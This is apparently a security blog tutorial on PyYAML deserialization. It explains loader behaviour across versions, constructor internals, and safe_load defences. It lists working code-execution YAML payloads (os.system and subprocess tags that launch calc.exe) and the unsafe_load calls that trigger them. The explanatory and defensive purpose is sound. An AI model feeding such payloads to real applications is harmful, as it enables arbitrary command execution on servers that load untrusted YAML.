Python Deserialization: the PyYAML Module
老铁233 · posted from Guangdong · Web Security · 744 views · 2024-05-26 11:49

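Deserialization vulnerabilities are also known as object injection. In Python, pickle has the same class of problem as PyYAML; this article covers only PyYAML.

YAML is an intuitive, machine-readable data serialization format. Compared with pickle or PHP serialization it is easy for humans to read. It resembles XML, but its syntax is much simpler. It is often used for configuration files during development, but it also carries security risks.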

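Introduction to YAML

Simply put, YAML is a language designed for writing configuration files, and it is more convenient than JSON. It is easy for people to read and write, and it is a lighter-weight format than XML or JSON.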

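Basic functions

  • load(): parses one YAML document and returns a Python object
  • load_all(): returns a generator that yields one object per document
  • dump(): serializes a Python object into a YAML document
  • dump_all(): serializes several objects into one stream of documents

Example: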

# yaml_5_3_1 appears to be a local copy of PyYAML 5.3.1 installed under a separate name
import yaml_5_3_1

test_list = ["123", {"dict":"123456"}, 666]

test_res = yaml_5_3_1.dump(test_list)

print("{0}".format(test_res))

test_list = yaml_5_3_1.load(test_res)

print("test_list = {0}".format(test_list))

test_list2 = ["456", {"dict":"66666"}, 777]

test_res = yaml_5_3_1.dump_all([test_list,test_list2])
print("----------------------------")
print("{0}".format(test_res))

test_list_res = yaml_5_3_1.load_all(test_res)

print("test_list_res = {0}".format(test_list_res))
for i in test_list_res:
    print(i)


>>>
- '123'
- dict: '123456'
- 666

test_list = ['123', {'dict': '123456'}, 666]
----------------------------
- '123'
- dict: '123456'
- 666
---
- '456'
- dict: '66666'
- 777

test_list_res = <generator object load_all at 0x0000028C354BA190>
['123', {'dict': '123456'}, 666]
['456', {'dict': '66666'}, 777]


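The deserialization problem

Version differences

PyYAML >= 5.1 is safer by default, while versions < 5.1 are unsafe by default: from 5.1 on, load() without an explicit Loader falls back to the restricted FullLoader instead of the unrestricted Loader. (FullLoader itself was later found to be bypassable, see CVE-2020-1747 and CVE-2020-14343, and PyYAML 6.0 made the Loader argument mandatory.) The following code illustrates the difference: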

import yaml
import yaml_5_3_1


def test_old_yaml():
    payload = '!!python/object/apply:os.system ["calc.exe"]'
    dump_payload = '!!python/object:get_poc.yamlPoc {}'
    yaml.load(dump_payload)


def test_new_yaml():
    payload = '!!python/object/apply:os.system ["calc.exe"]'
    dump_payload = '!!python/object:get_poc.yamlPoc {}'
    yaml_5_3_1.load(dump_payload)  # raises an error
    # yaml_5_3_1.load(dump_payload, Loader=yaml_5_3_1.Loader)  # explicitly unsafe Loader: launches the calculator


if __name__ == "__main__":
    # test_old_yaml()  # launches the calculator
    test_new_yaml()  # raises an error

The two runs behave differently: the old version launches the calculator, while 5.3.1 raises an error.
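To make the version split easier to check, here is a minimal sketch that maps a PyYAML version string to what load() does when no Loader is passed. The function name default_load_behaviour and the returned labels are made up for illustration. The cut-offs (5.1 and 6.0) follow the PyYAML release history.

```python
import re


def default_load_behaviour(version):
    """Describe what yaml.load(data) without a Loader does for a PyYAML version.

    Hypothetical helper: the name and the returned strings are illustrative only.
    """
    match = re.match(r"(\d+)\.(\d+)", version)
    if match is None:
        raise ValueError("unrecognised version string: {0!r}".format(version))
    major, minor = int(match.group(1)), int(match.group(2))
    if (major, minor) < (5, 1):
        # Old releases: the unrestricted Loader is the default.
        return "unsafe: load() defaults to the unrestricted Loader"
    if major < 6:
        # 5.1 up to 5.4.x: a warning is emitted and FullLoader is used.
        return "restricted: load() warns and falls back to FullLoader"
    # 6.0 and later: calling load() without a Loader is an error.
    return "explicit: load() requires a Loader argument"


for version in ("3.13", "5.3.1", "6.0.1"):
    print(version, "->", default_load_behaviour(version))
```

In a real project the version string would typically come from yaml.__version__.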

Versions below 5.1

  • Generating the PoC
import os
import yaml_5_3_1


class yamlPoc(object):
    def __init__(self):
        os.system("calc.exe")


dump_payload = yaml_5_3_1.dump(yamlPoc())

print("{0}".format(dump_payload))

>>>
!!python/object:__main__.yamlPoc {}

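This gives us the serialized payload string.

  • However, this PoC cannot be used directly: loading it from another program raises an error, because the tag refers to __main__.yamlPoc, a class that exists only in the script that generated it.

  • The generated PoC resolves only inside the __main__ module that defined the class, so it needs a small adjustment to name the real module: !!python/object:get_poc.yamlPoc {}

This raises the next problem: if the get_poc module does not exist on the target, the PoC cannot be exploited.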
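The reason the dumped payload says __main__ can be seen without PyYAML at all: the tag suffix is built from the class's module name and class name. The sketch below is a simplified model of that naming step, not PyYAML's own code. tag_suffix and Demo are hypothetical names used only for illustration.

```python
from fractions import Fraction


def tag_suffix(obj):
    """Return "module.ClassName", the part that follows "!!python/object:" in a tag."""
    cls = type(obj)
    return "{0}.{1}".format(cls.__module__, cls.__name__)


class Demo(object):
    """Harmless stand-in for the article's yamlPoc class."""


# A class defined in the script being executed belongs to the module "__main__",
# so a payload generated this way only resolves inside that same script.
print("!!python/object:" + tag_suffix(Demo()))

# A class from an importable module carries that module's real name instead.
print(tag_suffix(Fraction(1, 2)))
```

This is why the payload has to be rewritten to get_poc.yamlPoc before another process can resolve it.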

  • A generic PoC

So we build the payload from modules that ship with Python.

Some generic PoCs:

!!python/object/apply:os.system ["calc.exe"]
!!python/object/new:os.system ["calc.exe"]    
!!python/object/new:subprocess.check_output [["calc.exe"]]
!!python/object/apply:subprocess.check_output [["calc.exe"]]

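Result: loading any of these with a vulnerable version runs the command.

Code analysis

Why do these payloads execute? Let's walk through it.

First, look at what Constructor registers when it is set up, taking !!python/object/apply:os.system ["calc.exe"] as the example: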

Constructor.add_constructor(
    'tag:yaml.org,2002:python/none',
    Constructor.construct_yaml_null)

Constructor.add_constructor(
    'tag:yaml.org,2002:python/bool',
    Constructor.construct_yaml_bool)

Constructor.add_constructor(
    'tag:yaml.org,2002:python/str',
    Constructor.construct_python_str)

Constructor.add_constructor(
    'tag:yaml.org,2002:python/unicode',
    Constructor.construct_python_unicode)

Constructor.add_constructor(
    'tag:yaml.org,2002:python/bytes',
    Constructor.construct_python_bytes)

Constructor.add_constructor(
    'tag:yaml.org,2002:python/int',
    Constructor.construct_yaml_int)

Constructor.add_constructor(
    'tag:yaml.org,2002:python/long',
    Constructor.construct_python_long)

Constructor.add_constructor(
    'tag:yaml.org,2002:python/float',
    Constructor.construct_yaml_float)

Constructor.add_constructor(
    'tag:yaml.org,2002:python/complex',
    Constructor.construct_python_complex)

Constructor.add_constructor(
    'tag:yaml.org,2002:python/list',
    Constructor.construct_yaml_seq)

Constructor.add_constructor(
    'tag:yaml.org,2002:python/tuple',
    Constructor.construct_python_tuple)

Constructor.add_constructor(
    'tag:yaml.org,2002:python/dict',
    Constructor.construct_yaml_map)

Constructor.add_multi_constructor(
    'tag:yaml.org,2002:python/name:',
    Constructor.construct_python_name)

Constructor.add_multi_constructor(
    'tag:yaml.org,2002:python/module:',
    Constructor.construct_python_module)

Constructor.add_multi_constructor(
    'tag:yaml.org,2002:python/object:',
    Constructor.construct_python_object)

Constructor.add_multi_constructor(
    'tag:yaml.org,2002:python/object/apply:',
    Constructor.construct_python_object_apply)

Constructor.add_multi_constructor(
    'tag:yaml.org,2002:python/object/new:',
    Constructor.construct_python_object_new)

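Note: many constructor types are registered; the problem lies in the last two (python/object/apply: and python/object/new:).

  • Read the data to be deserialized

  • Get the YAML node

  • Start constructing the document

  • !!python/object/apply is a complex tag handled by a multi-constructor, so the next step calls construct_python_object_apply

  • At this point the Python instance is created, which triggers the dangerous operation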
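The steps above can be sketched in plain Python. This is a deliberately simplified model of prefix-based tag dispatch, not PyYAML's implementation: construct, construct_apply and MULTI_CONSTRUCTORS are names invented here, and math.factorial stands in for os.system so that running it is harmless.

```python
import importlib

APPLY_PREFIX = "tag:yaml.org,2002:python/object/apply:"


def find_python_name(name):
    """Resolve "module.attr" by importing the module, as an unsafe loader would."""
    module_name, _, attr = name.rpartition(".")
    module = importlib.import_module(module_name or "builtins")
    return getattr(module, attr)


def construct_apply(suffix, args):
    """Look up the callable named by the tag suffix and call it with the node's arguments."""
    return find_python_name(suffix)(*args)


# Prefix -> handler table, loosely mirroring add_multi_constructor registrations.
MULTI_CONSTRUCTORS = {APPLY_PREFIX: construct_apply}


def construct(tag, args):
    """Dispatch on the tag prefix and pass the remainder (the suffix) to the handler."""
    for prefix, constructor in MULTI_CONSTRUCTORS.items():
        if tag.startswith(prefix):
            return constructor(tag[len(prefix):], args)
    raise ValueError("could not determine a constructor for the tag {0!r}".format(tag))


# Equivalent in spirit to: !!python/object/apply:math.factorial [5]
print(construct(APPLY_PREFIX + "math.factorial", [5]))
```

Because the attacker controls both the suffix and the argument list, any importable callable can be reached this way, which is exactly what the os.system payload relies on.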

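Postscript: why is deserializing with safe_load not a problem?

  • safe_load always uses SafeLoader
  • SafeLoader never registers the python/* multi-constructors, so these tags simply cannot be deserialized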
def safe_load(stream):
    """
    Parse the first YAML document in a stream
    and produce the corresponding Python object.
    Resolve only basic YAML tags.
    """
    return load(stream, SafeLoader)

class SafeLoader(Reader, Scanner, Parser, Composer, SafeConstructor, Resolver):

    def __init__(self, stream):
        Reader.__init__(self, stream)
        Scanner.__init__(self)
        Parser.__init__(self)
        Composer.__init__(self)
        SafeConstructor.__init__(self)
        Resolver.__init__(self)

SafeConstructor.add_constructor(
        'tag:yaml.org,2002:null',
        SafeConstructor.construct_yaml_null)

SafeConstructor.add_constructor(
        'tag:yaml.org,2002:bool',
        SafeConstructor.construct_yaml_bool)

SafeConstructor.add_constructor(
        'tag:yaml.org,2002:int',
        SafeConstructor.construct_yaml_int)

SafeConstructor.add_constructor(
        'tag:yaml.org,2002:float',
        SafeConstructor.construct_yaml_float)

SafeConstructor.add_constructor(
        'tag:yaml.org,2002:binary',
        SafeConstructor.construct_yaml_binary)

SafeConstructor.add_constructor(
        'tag:yaml.org,2002:timestamp',
        SafeConstructor.construct_yaml_timestamp)

SafeConstructor.add_constructor(
        'tag:yaml.org,2002:omap',
        SafeConstructor.construct_yaml_omap)

SafeConstructor.add_constructor(
        'tag:yaml.org,2002:pairs',
        SafeConstructor.construct_yaml_pairs)

SafeConstructor.add_constructor(
        'tag:yaml.org,2002:set',
        SafeConstructor.construct_yaml_set)

SafeConstructor.add_constructor(
        'tag:yaml.org,2002:str',
        SafeConstructor.construct_yaml_str)

SafeConstructor.add_constructor(
        'tag:yaml.org,2002:seq',
        SafeConstructor.construct_yaml_seq)

SafeConstructor.add_constructor(
        'tag:yaml.org,2002:map',
        SafeConstructor.construct_yaml_map)

SafeConstructor.add_constructor(None,
        SafeConstructor.construct_undefined)
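A quick way to confirm this behaviour is to feed the generic PoC to safe_load and observe that it is refused. The sketch below assumes PyYAML is installed as yaml. try_safe_load is a hypothetical wrapper written for this example.

```python
import yaml


def try_safe_load(document):
    """Return ("ok", value) or ("rejected", error class name) for a YAML string."""
    try:
        return "ok", yaml.safe_load(document)
    except yaml.YAMLError as exc:
        # ConstructorError is a subclass of yaml.YAMLError.
        return "rejected", type(exc).__name__


# Plain data loads normally.
print(try_safe_load("name: demo\nport: 8080"))

# The generic PoC hits construct_undefined and is refused; nothing is imported or called.
print(try_safe_load('!!python/object/apply:os.system ["calc.exe"]'))
```

The second call should report a ConstructorError, because the python/object/apply: tag has no registered constructor in SafeConstructor and falls through to construct_undefined.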

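Versions 5.1 and above

Compared with versions below 5.1, later versions are safe by default, and the generic PoCs do not work out of the box.

For backward compatibility, however, two entry points remain unsafe: load() with Loader=Loader, and unsafe_load().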

import yaml
import yaml_5_3_1


def test_old_yaml():
    # payload = '!!python/object:__main__.yamlPoc {}'
    dump_payload = '!!python/object/apply:os.system ["calc.exe"]'
    yaml.safe_load(dump_payload)


def test_new_yaml():
    payload = '!!python/object/apply:os.system ["calc.exe"]'
    dump_payload = '!!python/object/apply:os.system ["calc.exe"]'
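    # yaml_5_3_1.load(dump_payload)  # raises an error

    yaml_5_3_1.load(dump_payload, Loader=yaml_5_3_1.Loader)  # explicitly unsafe Loader: launches the calculator
    yaml_5_3_1.unsafe_load(dump_payload)  # same effect as Loader=Loader


if __name__ == "__main__":
    # test_old_yaml()  # safe_load rejects the payload; plain yaml.load on < 5.1 would launch the calculator
    test_new_yaml()  # launches the calculator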

Code analysis

  • FullLoader is used by default

FullConstructor.add_constructor(
    'tag:yaml.org,2002:python/none',
    FullConstructor.construct_yaml_null)

FullConstructor.add_constructor(
    'tag:yaml.org,2002:python/bool',
    FullConstructor.construct_yaml_bool)

FullConstructor.add_constructor(
    'tag:yaml.org,2002:python/str',
    FullConstructor.construct_python_str)

FullConstructor.add_constructor(
    'tag:yaml.org,2002:python/unicode',
    FullConstructor.construct_python_unicode)

FullConstructor.add_constructor(
    'tag:yaml.org,2002:python/bytes',
    FullConstructor.construct_python_bytes)

FullConstructor.add_constructor(
    'tag:yaml.org,2002:python/int',
    FullConstructor.construct_yaml_int)

FullConstructor.add_constructor(
    'tag:yaml.org,2002:python/long',
    FullConstructor.construct_python_long)

FullConstructor.add_constructor(
    'tag:yaml.org,2002:python/float',
    FullConstructor.construct_yaml_float)

FullConstructor.add_constructor(
    'tag:yaml.org,2002:python/complex',
    FullConstructor.construct_python_complex)

FullConstructor.add_constructor(
    'tag:yaml.org,2002:python/list',
    FullConstructor.construct_yaml_seq)

FullConstructor.add_constructor(
    'tag:yaml.org,2002:python/tuple',
    FullConstructor.construct_python_tuple)

FullConstructor.add_constructor(
    'tag:yaml.org,2002:python/dict',
    FullConstructor.construct_yaml_map)

FullConstructor.add_multi_constructor(
    'tag:yaml.org,2002:python/name:',
    FullConstructor.construct_python_name)

FullConstructor.add_multi_constructor(
    'tag:yaml.org,2002:python/module:',
    FullConstructor.construct_python_module)

FullConstructor.add_multi_constructor(
    'tag:yaml.org,2002:python/object:',
    FullConstructor.construct_python_object)

FullConstructor.add_multi_constructor(
    'tag:yaml.org,2002:python/object/new:',
    FullConstructor.construct_python_object_new)
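  • python/object/new: is still registered, but make_python_instance refuses to call plain functions (it expects a class) and will not import modules that are not already loaded

  • safe_load applies even stricter limits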
# safe_loader
SafeConstructor.add_constructor(
        'tag:yaml.org,2002:null',
        SafeConstructor.construct_yaml_null)

SafeConstructor.add_constructor(
        'tag:yaml.org,2002:bool',
        SafeConstructor.construct_yaml_bool)

SafeConstructor.add_constructor(
        'tag:yaml.org,2002:int',
        SafeConstructor.construct_yaml_int)

SafeConstructor.add_constructor(
        'tag:yaml.org,2002:float',
        SafeConstructor.construct_yaml_float)

SafeConstructor.add_constructor(
        'tag:yaml.org,2002:binary',
        SafeConstructor.construct_yaml_binary)

SafeConstructor.add_constructor(
        'tag:yaml.org,2002:timestamp',
        SafeConstructor.construct_yaml_timestamp)

SafeConstructor.add_constructor(
        'tag:yaml.org,2002:omap',
        SafeConstructor.construct_yaml_omap)

SafeConstructor.add_constructor(
        'tag:yaml.org,2002:pairs',
        SafeConstructor.construct_yaml_pairs)

SafeConstructor.add_constructor(
        'tag:yaml.org,2002:set',
        SafeConstructor.construct_yaml_set)

SafeConstructor.add_constructor(
        'tag:yaml.org,2002:str',
        SafeConstructor.construct_yaml_str)

SafeConstructor.add_constructor(
        'tag:yaml.org,2002:seq',
        SafeConstructor.construct_yaml_seq)

SafeConstructor.add_constructor(
        'tag:yaml.org,2002:map',
        SafeConstructor.construct_yaml_map)

SafeConstructor.add_constructor(None,
        SafeConstructor.construct_undefined)
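For comparison with the SafeConstructor list, the two FullLoader restrictions mentioned earlier (classes only, and only from modules that are already loaded) can be modelled in a few lines. This is a sketch of the idea, not the code from PyYAML 5.3.1, and the function names are invented for the example.

```python
import collections
import os
import sys


def find_python_name_restricted(name):
    """Resolve "module.attr" only if the module is already in sys.modules."""
    module_name, _, attr = name.rpartition(".")
    if module_name not in sys.modules:
        raise LookupError("module {0!r} is not imported".format(module_name))
    return getattr(sys.modules[module_name], attr)


def make_python_instance_restricted(name, args):
    """Create an instance only when the resolved target is a class."""
    target = find_python_name_restricted(name)
    if not isinstance(target, type):
        raise TypeError("expected a class, but found {0!r}".format(type(target)))
    return target.__new__(target, *args)


# A class from an already imported module is allowed.
print(make_python_instance_restricted("collections.OrderedDict", []))

# os.system is a function, not a class, so it is refused before being called.
# get_poc is not loaded in this process, so it is refused without being imported.
for name in ("os.system", "get_poc.yamlPoc"):
    try:
        make_python_instance_restricted(name, ["echo never-run"])
    except (TypeError, LookupError) as exc:
        print(name, "->", exc)
```

These two checks explain why both the os.system payload and the get_poc payload fail under the default loader of 5.3.1, even though the tag itself is still recognised.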

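Some limitations of safe_load

Of course, at the application level safe_load restricts us to the basic types, so functionality and security have to be weighed against each other.

For example, complex numbers fail to load: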
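One possible middle ground, shown here only as a sketch, is to subclass SafeLoader and allow exactly the extra tag the application needs. ComplexSafeLoader and construct_complex are hypothetical names. add_constructor and construct_scalar are regular PyYAML APIs. Registering on the subclass leaves the stock SafeLoader untouched.

```python
import yaml


class ComplexSafeLoader(yaml.SafeLoader):
    """SafeLoader plus one explicitly allowed extra tag (hypothetical example class)."""


def construct_complex(loader, node):
    """Build a complex number from a scalar such as 1+2j."""
    return complex(loader.construct_scalar(node))


# Registered on the subclass only; yaml.SafeLoader itself is unchanged.
ComplexSafeLoader.add_constructor(
    "tag:yaml.org,2002:python/complex", construct_complex)

document = "value: !!python/complex 1+2j"

# Stock safe_load has no constructor for this tag and refuses the document.
try:
    yaml.safe_load(document)
except yaml.YAMLError as exc:
    print("safe_load rejected it:", type(exc).__name__)

# The extended loader accepts complex numbers and still nothing else from python/*.
print(yaml.load(document, Loader=ComplexSafeLoader))
```

The design choice is to extend the allow-list one tag at a time rather than switching to an unsafe loader for the whole document.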

Other libraries

In short, ruamel.yaml is used in much the same way as PyYAML, and it supports the newer YAML 1.2 by default.

Defenses

PyYAML                              ruamel.yaml
safe_load()                         safe_load()
safe_load_all()                     safe_load_all()
load('data', Loader=SafeLoader)     load('data', Loader=SafeLoader)
safe_dump()                         safe_dump()
safe_dump_all()                     safe_dump_all()
dump('data', Dumper=SafeDumper)     dump('data', Dumper=SafeDumper)

Note that recent ruamel.yaml releases deprecate these module-level functions in favour of YAML(typ='safe').